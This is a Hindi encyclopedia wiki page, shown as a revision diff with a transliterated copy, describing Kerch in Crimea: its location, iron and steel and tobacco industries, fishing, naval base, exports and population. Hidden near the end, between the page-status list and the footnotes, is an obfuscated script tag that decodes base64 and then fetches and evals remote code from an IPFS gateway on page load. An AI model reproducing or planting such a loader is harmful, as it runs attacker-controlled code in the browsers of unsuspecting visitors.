Difference between revisions of "केर्च"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''केर्च''' रूस में क्रीमिया (Crimea) प्रायद्वीप का एक नगर ए...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
'''केर्च''' रूस में क्रीमिया (Crimea) प्रायद्वीप का एक नगर एवं पत्तन जो काले तथा एजॉव सागर (Azov) को मिलानेवाले 300 फुट चौड़े केर्च जलसंयोजक के तट पर स्थित है (स्थिति 45 20 उत्त्र. अक्षांस. तथा 36 30 पूर्वी. देशांत)। यह नगर बहुत ही सुंदर है जिसका विस्तार एक पहाड़ी के चारों ओर हुआ है। यह क्रीमिया के पास पाए जाने वाले लोहे तथा इस्पात उद्योग का केंद्र है। यहाँ कोयला डोनेट्स (Donets) क्षेत्र से आता है। केर्च के निकट खनिज तेल, गैस, गंधक तथा नमक (झीलों से) मिलता है। क्रीमिया में सर्वोच्च कोटि की तंबाकू उत्पन्न की जाती है। अत: यहाँ तबाकू एवं सिगरेट बनाने के उद्योग का भी विकास हुआ है। फल तथा सब्जियाँ डिब्बों में बंद कर बाहर भेजी जाती हैं। यह क्रीमिया के मतस्य उद्योग का भी केंद्र है। यह रूसी नौसेना का अड्डा भी है। इस पत्तन का मुख्य निर्यात कच्चा लोहा, गेहूँ, जौ, आटा, ऊन, कच्चा चमड़ा, मछली, खनिज तेल, फल, लकड़ी, सिगरेट, शराब, सीमेंट तथा मशीनें हैं। इसकी जनसंख्या 1,15,000 (1967) है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 3|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=120 |url=}}</ref>  
+
'''केर्च''' [[रूस]] में क्रीमिया (Crimea) प्रायद्वीप का एक नगर एवं पत्तन जो काले तथा एजॉव सागर (Azov) को मिलाने वाले 300 फुट चौड़े केर्च जल संयोजक के तट पर स्थित है।<ref>स्थिति 45 20 उत्त्र. अक्षांस. तथा 36 30 पूर्वी. देशांत</ref> यह नगर बहुत ही सुंदर है जिसका विस्तार एक पहाड़ी के चारों ओर हुआ है।  
 +
 
 +
यह क्रीमिया के पास पाए जाने वाले [[लोहा|लोहे]] तथा [[इस्पात]] उद्योग का केंद्र है। यहाँ [[कोयला|कोयला डोनेट्स]] (Donets) क्षेत्र से आता है। केर्च के निकट [[खनिज तेल]], [[गैस]], [[गंधक]] तथा [[नमक]] [[झील|झीलों]] से मिलता है। क्रीमिया में सर्वोच्च कोटि का [[तंबाकू]] उत्पन्न किया जाता है। अत: यहाँ '''तंबाकू एवं सिगरेट''' बनाने के उद्योग का भी विकास हुआ है।  
 +
 
 +
[[फल]] तथा [[सब्जियाँ]] डिब्बों में बंद कर बाहर भेजी जाती हैं। यह क्रीमिया के [[मछली|मतस्य उद्योग]] का भी केंद्र है। यह '''रूसी नौसेना का अड्डा''' भी है। इस पत्तन का मुख्य निर्यात [[लोहा|कच्चा लोहा]], [[गेहूँ]], [[जौ]], आटा, [[ऊन]], [[चमड़ा उद्योग|कच्चा चमड़ा]], [[मछली]], [[खनिज तेल]], [[फल]], लकड़ी, सिगरेट, शराब, सीमेंट तथा मशीनें हैं। इसकी जनसंख्या 1,15,000<ref>सन् 1967 के अनुसार</ref> है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 3|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=120 |url=}}</ref>  
  
  

Latest revision as of 07:13, 13 January 2020

kerch roos mean krimiya (Crimea) prayadvip ka ek nagar evan pattan jo kale tatha ej aauv sagar (Azov) ko milane vale 300 phut chau de kerch jal sanyojak ke tat par sthit hai.[1] yah nagar bahut hi suandar hai jisaka vistar ek paha di ke charoan or hua hai.

yah krimiya ke pas pae jane vale lohe tatha ispat udyog ka keandr hai. yahaan koyala donets (Donets) kshetr se ata hai. kerch ke nikat khanij tel, gais, gandhak tatha namak jhiloan se milata hai. krimiya mean sarvochch koti ka tanbakoo utpann kiya jata hai. at: yahaan tanbakoo evan sigaret banane ke udyog ka bhi vikas hua hai.

phal tatha sabjiyaan dibboan mean band kar bahar bheji jati haian. yah krimiya ke matasy udyog ka bhi keandr hai. yah roosi nausena ka adda bhi hai. is pattan ka mukhy niryat kachcha loha, gehooan, jau, ata, oon, kachcha cham da, machhali, khanij tel, phal, lak di, sigaret, sharab, simeant tatha mashinean haian. isaki janasankhya 1,15,000[2] hai.[3]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. sthiti 45 20 uttr. akshaans. tatha 36 30 poorvi. deshaant
  2. sanh 1967 ke anusar
  3. hindi vishvakosh, khand 3 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 120 |

sanbandhit lekh